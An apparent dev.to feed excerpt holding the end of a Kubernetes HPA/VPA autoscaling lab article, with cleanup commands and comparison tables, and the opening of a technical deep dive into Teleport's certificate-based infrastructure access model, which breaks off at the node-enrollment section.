&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; Once HPA hits &lt;code&gt;maxReplicas&lt;/code&gt;, the &lt;code&gt;ScalingLimited&lt;/code&gt; condition becomes &lt;code&gt;True&lt;/code&gt; with a message indicating the bound was hit. In production, alerting on &lt;code&gt;ScalingLimited=True&lt;/code&gt; for more than a few minutes signals that your &lt;code&gt;maxReplicas&lt;/code&gt; is too low or your workload has genuinely outgrown its current sizing.&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Also useful: describe shows human-readable metric values&lt;/span&gt;
kubectl describe hpa php-apache | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-A5&lt;/span&gt; &lt;span class="s2"&gt;"Metrics:"&lt;/span&gt;

&lt;span class="c"&gt;# Cleanup&lt;/span&gt;
kubectl delete pod limit-test &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete hpa php-apache &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete deployment php-apache &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete svc php-apache &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Final Cleanup
&lt;/h2&gt;

&lt;p&gt;When you're done with all exercises:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Delete the kind cluster entirely&lt;/span&gt;
kind delete cluster &lt;span class="nt"&gt;--name&lt;/span&gt; autoscaling-lab
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;h3&gt;
  
  
  HPA Signal Tradeoff: CPU vs. External Metrics
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;CPU&lt;/th&gt;
&lt;th&gt;RPS / Queue Depth&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Signal latency&lt;/td&gt;
&lt;td&gt;High (lagging ~45s+)&lt;/td&gt;
&lt;td&gt;Low (near-real-time)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Infra dependency&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Metrics pipeline required&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;VPA coupling risk&lt;/td&gt;
&lt;td&gt;High — distorts utilization ratio&lt;/td&gt;
&lt;td&gt;None — orthogonal signal&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Throttling blind spot&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Stability&lt;/td&gt;
&lt;td&gt;Higher&lt;/td&gt;
&lt;td&gt;Lower (noisy metrics amplify)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Failure mode&lt;/td&gt;
&lt;td&gt;Under-scaling&lt;/td&gt;
&lt;td&gt;Over-scaling&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  HPA vs. VPA at a Glance
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;HPA&lt;/th&gt;
&lt;th&gt;VPA&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Scaling axis&lt;/td&gt;
&lt;td&gt;Horizontal (replica count)&lt;/td&gt;
&lt;td&gt;Vertical (resource requests)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Reaction speed&lt;/td&gt;
&lt;td&gt;Seconds to minutes&lt;/td&gt;
&lt;td&gt;Minutes to hours&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pod disruption&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Restart required (unless In-Place beta)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Control model&lt;/td&gt;
&lt;td&gt;Delayed P-controller&lt;/td&gt;
&lt;td&gt;Statistical percentile estimator&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Safe to combine&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;td&gt;Only on orthogonal metrics&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Best for&lt;/td&gt;
&lt;td&gt;Spiky, stateless workloads&lt;/td&gt;
&lt;td&gt;Rightsizing; stateful workloads&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PDB interaction&lt;/td&gt;
&lt;td&gt;Respects during rolling update&lt;/td&gt;
&lt;td&gt;Updater respects PDB — can stall silently&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Full Reference
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;HPA&lt;/th&gt;
&lt;th&gt;VPA&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Controller location&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;kube-controller-manager&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Separate Deployment (3 components)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Metrics source&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Metrics APIs (resource/custom/external)&lt;/td&gt;
&lt;td&gt;metrics-server + historical samples&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Understanding HPA as a delayed, saturating proportional controller with a 90–120 second reaction pipeline, and VPA as a statistical offline optimizer that must restart pods to apply its recommendations and cannot observe throttled CPU accurately, reframes how you tune both systems. Neither loop operates in isolation — they share the same node pool, react to overlapping signals, and can amplify each other's effects into the destabilizing positive feedback loops described above. Map symptoms to the failure taxonomy before reaching for knobs. Instrument the signals in the observability section, and you will know which loop to blame before the incident review is scheduled.&lt;/p&gt;

&lt;p&gt;Autoscaling is not about making systems perfectly elastic — that's impossible given the phase lag, signal noise, and discrete provisioning steps involved. It is about designing systems where the failure modes are &lt;strong&gt;predictable, observable, and bounded&lt;/strong&gt;. The engineers who succeed with autoscaling aren't the ones who tune it perfectly — they're the ones who understand how it breaks.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Further reading: &lt;a href="https://github.com/kubernetes/enhancements/tree/master/keps/sig-node/1287-in-place-update-pod-resources" rel="noopener noreferrer"&gt;KEP-1287 In-Place Pod Vertical Scaling&lt;/a&gt; · &lt;a href="https://github.com/kubernetes/design-proposals-archive/blob/main/autoscaling/horizontal-pod-autoscaler.md" rel="noopener noreferrer"&gt;HPA algorithm design doc&lt;/a&gt; · &lt;a href="https://kubernetes.io/docs/reference/kubernetes-api/workload-resources/horizontal-pod-autoscaler-v2/" rel="noopener noreferrer"&gt;autoscaling/v2 API reference&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;Originally published at &lt;a href="https://platformwale.blog" rel="noopener noreferrer"&gt;https://platformwale.blog&lt;/a&gt;&lt;/p&gt;

</description>
      <category>kubernetes</category>
      <category>autoscaling</category>
      <category>containers</category>
    </item>
    <item>
      <title>How Teleport Works: A Deep Dive into Modern Infrastructure Access</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Thu, 26 Mar 2026 15:40:09 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/how-teleport-works-a-deep-dive-into-modern-infrastructure-access-14m5</link>
      <guid>https://dev.to/piyushjajoo/how-teleport-works-a-deep-dive-into-modern-infrastructure-access-14m5</guid>
      <description>&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Introduction&lt;/li&gt;
&lt;li&gt;The Core Problem Teleport Solves&lt;/li&gt;
&lt;li&gt;
Teleport vs VPN vs Bastion Hosts

&lt;ul&gt;
&lt;li&gt;VPN Model&lt;/li&gt;
&lt;li&gt;Bastion Host Model&lt;/li&gt;
&lt;li&gt;Teleport Model (Zero Trust Access Plane)&lt;/li&gt;
&lt;li&gt;Quick Comparison Table&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Fundamental Architecture Concepts

&lt;ul&gt;
&lt;li&gt;Non-Obvious Insight: Teleport Shifts the Trust Boundary&lt;/li&gt;
&lt;li&gt;The Cluster: Foundation of Teleport's Security Model&lt;/li&gt;
&lt;li&gt;Certificate-Based Authentication: The Heart of Teleport&lt;/li&gt;
&lt;li&gt;Short-Lived Certificates and Zero Standing Privileges&lt;/li&gt;
&lt;li&gt;Secure Node Enrollment (Join Tokens)&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Teleport Architecture Deep Dive

&lt;ul&gt;
&lt;li&gt;Control Plane vs Traffic Plane Separation&lt;/li&gt;
&lt;li&gt;Core Components&lt;/li&gt;
&lt;li&gt;1. Auth Service: The Certificate Authority&lt;/li&gt;
&lt;li&gt;2. Proxy Service: The Access Gateway&lt;/li&gt;
&lt;li&gt;3. Teleport Agents: Protocol-Specific Services&lt;/li&gt;
&lt;li&gt;Unified Resource Inventory and Discovery&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Advanced Features

&lt;ul&gt;
&lt;li&gt;Role-Based Access Control (RBAC)&lt;/li&gt;
&lt;li&gt;Access Requests: Just-In-Time Privilege Escalation&lt;/li&gt;
&lt;li&gt;Session Recording and Playback&lt;/li&gt;
&lt;li&gt;Session Moderation and Shared Access&lt;/li&gt;
&lt;li&gt;Device Trust and Hardware Security&lt;/li&gt;
&lt;li&gt;Trusted Clusters: Multi-Org Federation&lt;/li&gt;
&lt;li&gt;Teleport Connect: Desktop Experience&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

How It All Works Together: Complete Flow Examples

&lt;ul&gt;
&lt;li&gt;Example 1: SSH Access to Production Server&lt;/li&gt;
&lt;li&gt;Example 2: Database Access Request Workflow&lt;/li&gt;
&lt;li&gt;Example 3: Kubernetes Cluster Access&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Getting Started with Teleport

&lt;ul&gt;
&lt;li&gt;Quick Start: Local Testing&lt;/li&gt;
&lt;li&gt;Common Deployment Topologies&lt;/li&gt;
&lt;li&gt;Production Deployment Checklist&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Performance and Scaling Considerations

&lt;ul&gt;
&lt;li&gt;Connection Flow Overhead&lt;/li&gt;
&lt;li&gt;Scaling Characteristics&lt;/li&gt;
&lt;li&gt;High-Performance Deployments&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Best Practices

&lt;ul&gt;
&lt;li&gt;1. Certificate TTL Configuration&lt;/li&gt;
&lt;li&gt;2. Use Access Requests for Elevated Privileges&lt;/li&gt;
&lt;li&gt;3. Implement a Governed Resource Labels Strategy&lt;/li&gt;
&lt;li&gt;4. Enable Session Recording for All Production Access&lt;/li&gt;
&lt;li&gt;5. Integrate with Your Security Stack&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Failure Modes and Operational Realities

&lt;ul&gt;
&lt;li&gt;Component Failure Behavior&lt;/li&gt;
&lt;li&gt;CA Rotation&lt;/li&gt;
&lt;li&gt;RBAC Sprawl&lt;/li&gt;
&lt;li&gt;Debugging is Harder Than Direct SSH Because Teleport Introduces Multiple Control Points — Each a Potential Failure Boundary&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Trade-offs, Limitations, and Alternatives

&lt;ul&gt;
&lt;li&gt;Teleport Trade-offs&lt;/li&gt;
&lt;li&gt;What Teleport Does NOT Solve&lt;/li&gt;
&lt;li&gt;Comparison With Modern Alternatives&lt;/li&gt;
&lt;li&gt;When Teleport Becomes a Bad Idea&lt;/li&gt;
&lt;li&gt;How Teams Typically Adopt Teleport&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Opinionated Architecture Guidance

&lt;ul&gt;
&lt;li&gt;Rules of Thumb for Production Deployments&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

Troubleshooting Common Issues

&lt;ul&gt;
&lt;li&gt;Connection Issues&lt;/li&gt;
&lt;li&gt;Certificate Issues&lt;/li&gt;
&lt;li&gt;Performance Issues&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;Conclusion&lt;/li&gt;

&lt;li&gt;Additional Resources&lt;/li&gt;

&lt;/ul&gt;





&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;The average production environment has hundreds of servers, dozens of databases, multiple Kubernetes clusters, and engineers connecting from laptops, CI pipelines, and cloud VMs across every network imaginable. The traditional answer — VPNs, bastion hosts, SSH keys that accumulate for years — was never designed for this. It was designed for a world where your infrastructure lived in one data center and your engineers sat in one office.&lt;/p&gt;

&lt;p&gt;Teleport is a complete rethinking of infrastructure access for the distributed, ephemeral, multi-cloud reality most teams actually operate in. It replaces static credentials with short-lived certificates, VPN perimeters with identity-aware reverse tunnels, and fragmented audit trails with unified session recording across every protocol.&lt;/p&gt;

&lt;p&gt;This document is a technical deep dive into how Teleport works — its architecture, security model, failure behavior, and the operational decisions you'll need to make to run it well in production. It's written for engineers evaluating Teleport, implementing it, or trying to operate it at scale.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Mental Model:&lt;/strong&gt; Teleport = &lt;strong&gt;Identity-aware access proxy + certificate authority + audit system&lt;/strong&gt;. Users authenticate via SSO, receive short-lived certificates scoped to their roles, and connect to resources through a proxy that routes traffic via reverse tunnels from agents. No standing credentials. Every session recorded. Access determined by identity, not network location.&lt;/p&gt;
&lt;/blockquote&gt;


&lt;h2&gt;
  
  
  The Core Problem Teleport Solves
&lt;/h2&gt;

&lt;p&gt;Before diving into how Teleport works, let's understand the problems it addresses:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Traditional Infrastructure Access Challenges:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Static Credentials&lt;/strong&gt;: SSH keys, database passwords, and API tokens that live forever and proliferate across systems&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Trust on First Use (TOFU)&lt;/strong&gt;: The first SSH connection requires blindly trusting a host fingerprint&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Access Sprawl&lt;/strong&gt;: Different tools and methods for accessing servers, databases, Kubernetes, applications&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Poor Auditability&lt;/strong&gt;: Limited visibility into who accessed what, when, and what they did&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Credential Management&lt;/strong&gt;: Manual rotation, distribution, and revocation of access credentials&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Network Complexity&lt;/strong&gt;: VPNs, bastion hosts, and jump boxes that add latency and attack surface&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Teleport addresses these challenges through a certificate-based authentication model, unified access proxy, and comprehensive audit logging.&lt;/p&gt;


&lt;h2&gt;
  
  
  Teleport vs VPN vs Bastion Hosts
&lt;/h2&gt;

&lt;p&gt;Organizations have traditionally relied on VPNs and bastion hosts to provide infrastructure access. Teleport replaces these older models with a zero-trust, identity-native access plane.&lt;/p&gt;

&lt;p&gt;Here’s how they compare:&lt;/p&gt;


&lt;h3&gt;
  
  
  VPN Model
&lt;/h3&gt;

&lt;p&gt;VPNs extend the corporate network perimeter outward, effectively placing engineers “inside” the private network.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How it works:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;User connects to VPN
&lt;/li&gt;
&lt;li&gt;Gains broad network-level access
&lt;/li&gt;
&lt;li&gt;Then uses SSH, kubectl, database clients directly
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Limitations:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Network-level trust instead of identity-level trust
&lt;/li&gt;
&lt;li&gt;Difficult to enforce least privilege
&lt;/li&gt;
&lt;li&gt;Poor visibility into what happens after connection
&lt;/li&gt;
&lt;li&gt;VPN credentials are often long-lived
&lt;/li&gt;
&lt;li&gt;Expands attack surface by exposing entire subnets&lt;/li&gt;
&lt;/ul&gt;


&lt;h3&gt;
  
  
  Bastion Host Model
&lt;/h3&gt;

&lt;p&gt;Bastion hosts (jump boxes) centralize SSH entry through a hardened server.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How it works:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;User SSHs into bastion
&lt;/li&gt;
&lt;li&gt;Then hops into internal servers/databases
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Limitations:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Still relies on SSH keys or static credentials
&lt;/li&gt;
&lt;li&gt;Bastion becomes a high-value attack target
&lt;/li&gt;
&lt;li&gt;Limited protocol support beyond SSH
&lt;/li&gt;
&lt;li&gt;Session recording and auditing require extra tooling
&lt;/li&gt;
&lt;li&gt;Scaling bastions across regions is operationally complex&lt;/li&gt;
&lt;/ul&gt;


&lt;h3&gt;
  
  
  Teleport Model (Zero Trust Access Plane)
&lt;/h3&gt;

&lt;p&gt;Teleport replaces perimeter-based access with certificate-based, identity-aware access.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How it works:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Users authenticate via SSO + MFA
&lt;/li&gt;
&lt;li&gt;Teleport issues short-lived certificates
&lt;/li&gt;
&lt;li&gt;Proxy routes access to specific approved resources
&lt;/li&gt;
&lt;li&gt;Every session is recorded and audited
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Key Advantages:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;No VPN required &lt;strong&gt;for infrastructure access&lt;/strong&gt; — Teleport eliminates the VPN for SSH, databases, Kubernetes, and applications; organizations may still use VPNs for legacy systems, unsupported protocols, or east-west traffic patterns&lt;/li&gt;
&lt;li&gt;No inbound firewall rules (reverse tunnels)
&lt;/li&gt;
&lt;li&gt;Identity-based access, not network-based trust
&lt;/li&gt;
&lt;li&gt;Works across SSH, Kubernetes, databases, apps, desktops
&lt;/li&gt;
&lt;li&gt;Built-in audit logs, session playback, access requests
&lt;/li&gt;
&lt;li&gt;Credentials expire automatically (zero standing privileges)&lt;/li&gt;
&lt;/ul&gt;


&lt;h3&gt;
  
  
  Quick Comparison Table
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Feature&lt;/th&gt;
&lt;th&gt;VPN&lt;/th&gt;
&lt;th&gt;Bastion Host&lt;/th&gt;
&lt;th&gt;Teleport&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Trust Model&lt;/td&gt;
&lt;td&gt;Network perimeter&lt;/td&gt;
&lt;td&gt;Jump-box perimeter&lt;/td&gt;
&lt;td&gt;Zero Trust identity-based&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Credentials&lt;/td&gt;
&lt;td&gt;Long-lived&lt;/td&gt;
&lt;td&gt;SSH keys&lt;/td&gt;
&lt;td&gt;Short-lived certificates&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Access Scope&lt;/td&gt;
&lt;td&gt;Broad subnet access&lt;/td&gt;
&lt;td&gt;Host-level&lt;/td&gt;
&lt;td&gt;Resource + role scoped&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Auditability&lt;/td&gt;
&lt;td&gt;Weak&lt;/td&gt;
&lt;td&gt;Limited&lt;/td&gt;
&lt;td&gt;Full session + event audit&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Protocol Support&lt;/td&gt;
&lt;td&gt;Any network traffic&lt;/td&gt;
&lt;td&gt;Mostly SSH&lt;/td&gt;
&lt;td&gt;SSH, DB, K8s, Apps, RDP&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Firewall Exposure&lt;/td&gt;
&lt;td&gt;Requires network access&lt;/td&gt;
&lt;td&gt;Bastion exposed inbound&lt;/td&gt;
&lt;td&gt;Only Proxy exposed inbound&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Privilege Escalation&lt;/td&gt;
&lt;td&gt;Manual&lt;/td&gt;
&lt;td&gt;Manual&lt;/td&gt;
&lt;td&gt;Built-in Access Requests&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Teleport modernizes infrastructure access by eliminating static credentials, reducing attack surface, and making access fully observable and time-bounded.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Teleport doesn't just replace SSH — it replaces the idea that networks should be trusted.&lt;/p&gt;
&lt;/blockquote&gt;


&lt;h2&gt;
  
  
  Fundamental Architecture Concepts
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Non-Obvious Insight: Teleport Shifts the Trust Boundary
&lt;/h3&gt;

&lt;p&gt;Most infrastructure security improvements add controls &lt;em&gt;on top of&lt;/em&gt; an existing trust model. Teleport does something more fundamental — it shifts where trust lives.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Model&lt;/th&gt;
&lt;th&gt;What Is Trusted&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;VPN&lt;/td&gt;
&lt;td&gt;The network — if you're "inside", you're trusted&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Bastion host&lt;/td&gt;
&lt;td&gt;The jump box — SSH to it, then you're trusted&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Teleport&lt;/td&gt;
&lt;td&gt;Identity + device + time — the network is &lt;em&gt;never&lt;/em&gt; trusted&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Traditional systems ask: &lt;em&gt;"Is this request coming from the right network?"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Teleport asks: &lt;em&gt;"Is this a valid identity, with the right role, on an approved device, within a valid time window?"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;This shift has a non-obvious consequence: &lt;strong&gt;Teleport makes your infrastructure location-independent by design.&lt;/strong&gt; A contractor on a coffee shop WiFi, a CI pipeline in a cloud VM, and an on-call engineer on a home network all authenticate through the same identity-first path — with no VPN, no static keys, and no network-level exceptions to manage. The network becomes a commodity transport layer, not a security boundary.&lt;/p&gt;

&lt;p&gt;This is what "zero trust" actually means in practice — not a product category, but a fundamental reorientation of where the perimeter lives.&lt;/p&gt;


&lt;h3&gt;
  
  
  The Cluster: Foundation of Teleport's Security Model
&lt;/h3&gt;

&lt;p&gt;The cluster is the foundational concept in Teleport's architecture. A Teleport cluster is a logically grouped collection of services and resources that share a common certificate authority and security boundary.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3hg102yenj0h2fcnng3z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3hg102yenj0h2fcnng3z.png" alt="image" width="800" height="267"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key Principle&lt;/strong&gt;: Users and resources must join the same cluster before access can be granted. Teleport replaces SSH trust-on-first-use with CA-based node identity established during secure cluster join.&lt;/p&gt;


&lt;h3&gt;
  
  
  Certificate-Based Authentication: The Heart of Teleport
&lt;/h3&gt;

&lt;p&gt;Teleport operates as a certificate authority (CA) that issues short-lived certificates to both users and infrastructure resources. This is fundamentally different from traditional password or SSH key-based authentication.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffn51xq65kcg6y0cekgm5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffn51xq65kcg6y0cekgm5.png" alt="image" width="800" height="598"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why Certificates?&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Cryptographically Secure&lt;/strong&gt;: Much harder to forge than passwords or simple keys&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Self-Contained&lt;/strong&gt;: Include identity, permissions, and expiration in one signed document&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Decentralized Signature Validation&lt;/strong&gt;: Each service validates the certificate independently using the CA's public key — no Auth Service round-trip per request. However, &lt;strong&gt;authorization is still based on roles and policies centrally issued by the Auth Service&lt;/strong&gt;, and revocation requires CA rotation, user lockout, or session termination rather than a simple flag flip.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Automatic Expiration&lt;/strong&gt;: Expiration reduces reliance on revocation, though Teleport supports revocation mechanisms when needed&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Scalable&lt;/strong&gt;: Suitable for large deployments with many services&lt;/li&gt;
&lt;/ol&gt;


&lt;h3&gt;
  
  
  Short-Lived Certificates and Zero Standing Privileges
&lt;/h3&gt;

&lt;p&gt;Teleport issues certificates with very short time-to-live (TTL) periods, typically a few hours (configurable via &lt;code&gt;max_session_ttl&lt;/code&gt;). Access Requests may issue certificates for minutes or hours, and bot tokens often use much shorter TTLs. This creates a "zero standing privileges" model where access automatically expires.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fupbym0v9gkpv78knjbi7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fupbym0v9gkpv78knjbi7.png" alt="image" width="800" height="1576"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Benefits of Short-Lived Certificates:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The security properties described above compound into practical operational wins: a stolen certificate expires on its own, offboarding requires no key revocation sweep, there's no accumulation of forgotten credentials across systems, and every access event is time-bounded by design — making compliance audits straightforward. The explicit revocation mechanisms (CA rotation, user lockout, session termination) exist for immediate invalidation when you can't wait for TTL expiry.&lt;/p&gt;
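&lt;p&gt;As a concrete, illustrative example, the TTL cap lives on the role resource via &lt;code&gt;max_session_ttl&lt;/code&gt;. The role name, login, and labels below are placeholders, and the role resource version varies by Teleport release:&lt;/p&gt;

```yaml
kind: role
version: v7          # role resource version; check what your release supports
metadata:
  name: dev-access   # placeholder role name
spec:
  options:
    max_session_ttl: 4h   # certificates issued under this role expire in 4 hours
  allow:
    logins: ["ubuntu"]    # OS logins this role may assume
    node_labels:
      env: "dev"          # only nodes labeled env=dev are reachable
```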


&lt;h3&gt;
  
  
  Secure Node Enrollment (Join Tokens)
&lt;/h3&gt;

&lt;p&gt;A critical aspect of Teleport's security model is how agents and nodes securely join the cluster. This process establishes the initial trust relationship that underpins all subsequent certificate-based authentication.&lt;/p&gt;

